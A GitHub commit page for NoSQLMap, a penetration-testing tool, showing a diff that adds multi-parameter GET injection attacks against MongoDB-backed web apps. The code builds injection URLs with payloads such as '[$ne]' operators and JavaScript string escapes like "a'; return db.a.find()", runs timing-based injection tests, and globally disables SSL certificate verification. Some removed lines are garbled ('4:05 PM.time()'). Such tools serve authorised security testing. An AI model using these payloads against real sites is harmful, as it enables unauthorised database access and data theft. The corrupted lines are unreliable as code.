Skip to content

Commit

Permalink
Features and Bugfixes
Browse files Browse the repository at this point in the history
Add multi parameter GET attacks.  Fix a couple of bugs around URL
generation.
  • Loading branch information
tcstool authored and tcstool committed Jun 26, 2016
1 parent 807a58c commit 6811590
Show file tree
Hide file tree
Showing 2 changed files with 70 additions and 40 deletions.
16 changes: 11 additions & 5 deletions nosqlmap.py
Original file line number Diff line number Diff line change
Expand Up @@ -55,7 +55,13 @@ def mainMenu():
global victim
global dbPort
global myIP
global myPort
global webPort
global uri
global httpMethod
global https
global verb
global requestHeaders
global postData

mmSelect = True
while mmSelect:
Expand Down Expand Up @@ -100,10 +106,10 @@ def mainMenu():
#Check minimum required options
if (optionSet[0] == True) and (optionSet[2] == True):
if httpMethod == "GET":
nsmweb.getApps()
nsmweb.getApps(webPort,victim,uri,https,verb,requestHeaders)

else:
nsmweb.postApps()
elif httpMethod == "POST":
nsmweb.postApps(victim,webPort,uri,https,verb,postData,requestHeaders)

else:
raw_input("Options not set! Check host and URI path. Press enter to continue...")
Expand All @@ -130,6 +136,7 @@ def platSel():
global dbPort
select = True
print "\n"

while select:
print "1-MongoDB"
print "2-CouchDB"
Expand All @@ -145,7 +152,6 @@ def platSel():
dbPort = 5984
return
else:
psel = True
raw_input("Invalid selection. Press enter to continue.")

def options():
Expand Down
94 changes: 59 additions & 35 deletions nsmweb.py
Original file line number Diff line number Diff line change
@@ -1,16 +1,30 @@
import httplib2
import urllib
import urllib2
import json
import string
import nsmmongo
from sys import version_info
import datetime
import itertools
import re
import time
import random

def getApps(victim,webPort,uri,https,verb):
def httpRequestor (httpReq):
#Need to determine version of Python that's running to figure out how to handle self-signed certs.
if version_info() >= (2,7,9):
import ssl
ssl._create_default_https_context = ssl._create_unverified_context






def getApps(webPort,victim,uri,https,verb,requestHeaders):
print "Web App Attacks (GET)"
print "==============="
paramName = []
global testNum
global httpMethod
httpMethod = "GET"
testNum = 1
paramValue = []
global vulnAddrs
Expand All @@ -19,6 +33,8 @@ def getApps(victim,webPort,uri,https,verb):
possAddrs = []
timeVulnsStr = []
timeVulnsInt = []
yes_tag = ['y', 'Y']
no_tag = ['n', 'N']
appUp = False
strTbAttack = False
intTbAttack = False
Expand All @@ -30,7 +46,6 @@ def getApps(victim,webPort,uri,https,verb):
str24 = False
global int24
int24 = False
global requestHeaders

#Verify app is working.
print "Checking to see if site at " + str(victim) + ":" + str(webPort) + str(uri) + " is up..."
Expand Down Expand Up @@ -107,7 +122,7 @@ def getApps(victim,webPort,uri,https,verb):

if errorCheck == False:
injLen = int(len(urllib2.urlopen(req).read()))
checkResult(randLength,injLen,testNum)
checkResult(randLength,injLen,testNum,verb)
testNum += 1
else:
testNum += 1
Expand All @@ -125,7 +140,7 @@ def getApps(victim,webPort,uri,https,verb):

if errorCheck == False:
injLen = int(len(urllib2.urlopen(req).read()))
checkResult(randLength,injLen,testNum)
checkResult(randLength,injLen,testNum,verb)
testNum += 1

else:
Expand All @@ -144,7 +159,7 @@ def getApps(victim,webPort,uri,https,verb):

if errorCheck == False:
injLen = int(len(urllib2.urlopen(req).read()))
checkResult(randLength,injLen,testNum)
checkResult(randLength,injLen,testNum,verb)
testNum +=1

else:
Expand All @@ -163,7 +178,7 @@ def getApps(victim,webPort,uri,https,verb):

if errorCheck == False:
injLen = int(len(urllib2.urlopen(req).read()))
checkResult(randLength,injLen,testNum)
checkResult(randLength,injLen,testNum,verb)
testNum += 1
else:
testNum += 1
Expand All @@ -180,7 +195,7 @@ def getApps(victim,webPort,uri,https,verb):

if errorCheck == False:
injLen = int(len(urllib2.urlopen(req).read()))
checkResult(randLength,injLen,testNum)
checkResult(randLength,injLen,testNum,verb)
testNum +=1

else:
Expand All @@ -198,7 +213,7 @@ def getApps(victim,webPort,uri,https,verb):

if errorCheck == False:
injLen = int(len(urllib2.urlopen(req).read()))
checkResult(randLength,injLen,testNum)
checkResult(randLength,injLen,testNum,verb)
testNum += 1
else:
testNum += 1
Expand All @@ -215,7 +230,7 @@ def getApps(victim,webPort,uri,https,verb):

if errorCheck == False:
injLen = int(len(urllib2.urlopen(req).read()))
checkResult(randLength,injLen,testNum)
checkResult(randLength,injLen,testNum,verb)
testNum += 1
else:
testNum += 1
Expand All @@ -233,18 +248,19 @@ def getApps(victim,webPort,uri,https,verb):

if errorCheck == False:
injLen = int(len(urllib2.urlopen(req).read()))
checkResult(randLength,injLen,testNum)
checkResult(randLength,injLen,testNum,verb)
testNum += 1


doTimeAttack = raw_input("Start timing based tests (y/n)? ")

if doTimeAttack in yes_tag:
print "Starting Javascript string escape time based injection..."
req = urllib2.Request(uriArray[18], None, requestHeaders)
start = 4:05 PM.time()
start = time.time()
strTimeInj = urllib2.urlopen(req)
page = strTimeInj.read()
end = 4:05 PM.time()
end = time.time()
strTimeInj.close()
#print str(end)
#print str(start)
Expand Down Expand Up @@ -331,12 +347,14 @@ def getApps(victim,webPort,uri,https,verb):
raw_input("Press enter to continue...")
return()

def postApps():
def postApps(victim,webPort,uri,https,verb,postData,requestHeaders):
print "Web App Attacks (POST)"
print "==============="
paramName = []
paramValue = []
global vulnAddrs
global httpMethod
httpMethod = "POST"
vulnAddrs = []
global possAddrs
possAddrs = []
Expand All @@ -347,10 +365,8 @@ def postApps():
intTbAttack = False
trueStr = False
trueInt = False
global postData
global neDict
global gtDict
global requestHeaders
testNum = 1

#Verify app is working.
Expand Down Expand Up @@ -447,7 +463,7 @@ def postApps():

if errorCheck == False:
injLen = int(len(urllib2.urlopen(req).read()))
checkResult(randLength,injLen,testNum)
checkResult(randLength,injLen,testNum,verb)
testNum += 1

else:
Expand All @@ -474,7 +490,7 @@ def postApps():

if errorCheck == False:
injLen = int(len(urllib2.urlopen(req).read()))
checkResult(randLength,injLen,testNum)
checkResult(randLength,injLen,testNum,verb)
testNum += 1

postData.update({injOpt:"a'; return db.a.find(); var dummy='!"})
Expand All @@ -491,7 +507,7 @@ def postApps():

if errorCheck == False:
injLen = int(len(urllib2.urlopen(req).read()))
checkResult(randLength,injLen,testNum)
checkResult(randLength,injLen,testNum,verb)
testNum += 1
else:
testNum += 1
Expand All @@ -511,7 +527,7 @@ def postApps():

if errorCheck == False:
injLen = int(len(urllib2.urlopen(req).read()))
checkResult(randLength,injLen,testNum)
checkResult(randLength,injLen,testNum,verb)
testNum += 1
else:
testNum += 1
Expand All @@ -532,7 +548,7 @@ def postApps():

if errorCheck == False:
injLen = int(len(urllib2.urlopen(req).read()))
checkResult(randLength,injLen,testNum)
checkResult(randLength,injLen,testNum,verb)
testNum += 1

else:
Expand All @@ -553,7 +569,7 @@ def postApps():

if errorCheck == False:
injLen = int(len(urllib2.urlopen(req).read()))
checkResult(randLength,injLen,testNum)
checkResult(randLength,injLen,testNum,verb)
testNum += 1

else:
Expand All @@ -575,7 +591,7 @@ def postApps():

if errorCheck == False:
injLen = int(len(urllib2.urlopen(req).read()))
checkResult(randLength,injLen,testNum)
checkResult(randLength,injLen,testNum,verb)
testNum += 1
print "\n"
else:
Expand All @@ -595,7 +611,7 @@ def postApps():

if errorCheck == False:
injLen = int(len(urllib2.urlopen(req).read()))
checkResult(randLength,injLen,testNum)
checkResult(randLength,injLen,testNum,verb)
testNum += 1

else:
Expand Down Expand Up @@ -724,7 +740,7 @@ def errorTest (errorCheck,testNum):



def checkResult(baseSize,respSize,testNum):
def checkResult(baseSize,respSize,testNum,verb):
global vulnAddrs
global possAddrs
global lt24
Expand Down Expand Up @@ -834,7 +850,7 @@ def buildUri(origUri, randValue):
paramValue = []
global uriArray
uriArray = ["","","","","","","","","","","","","","","","","","",""]
injOpt = ""
injOpt = []

#Split the string between the path and parameters, and then split each parameter
try:
Expand All @@ -857,11 +873,17 @@ def buildUri(origUri, randValue):
menuItem += 1

try:
injIndex = raw_input("Which parameter should we inject? ")
injOpt = str(paramName[int(injIndex)-1])
print "Injecting the " + injOpt + " parameter..."
injIndex = raw_input("Enter parameters to inject in a comma separated list: ")

except:
for params in injIndex.split(","):
injOpt.append(paramName[int(params)-1])

#injOpt = str(paramName[int(injIndex)-1])

for params in injOpt:
print "Injecting the " + params + " parameter..."

except Exception:
raw_input("Something went wrong. Press enter to return to the main menu...")
return

Expand All @@ -887,7 +909,8 @@ def buildUri(origUri, randValue):
uriArray[18] = split_uri[0] + "?"

for item in paramName:
if paramName[x] == injOpt:

if paramName[x] in injOpt:
uriArray[0] += paramName[x] + "=" + randValue + "&"
uriArray[1] += paramName[x] + "[$ne]=" + randValue + "&"
uriArray[2] += paramName[x] + "=a'; return db.a.find(); var dummy='!" + "&"
Expand Down Expand Up @@ -933,14 +956,15 @@ def buildUri(origUri, randValue):

#Clip the extra & off the end of the URL
x = 0
while x <= 17:
while x <= 18:
uriArray[x]= uriArray[x][:-1]
x += 1

return uriArray[0]

def getDBInfo():
curLen = 0
yes_tag = ['y', 'Y']
nameLen = 0
gotFullDb = False
gotNameLen = False
Expand Down

0 comments on commit 6811590

Please sign in to comment.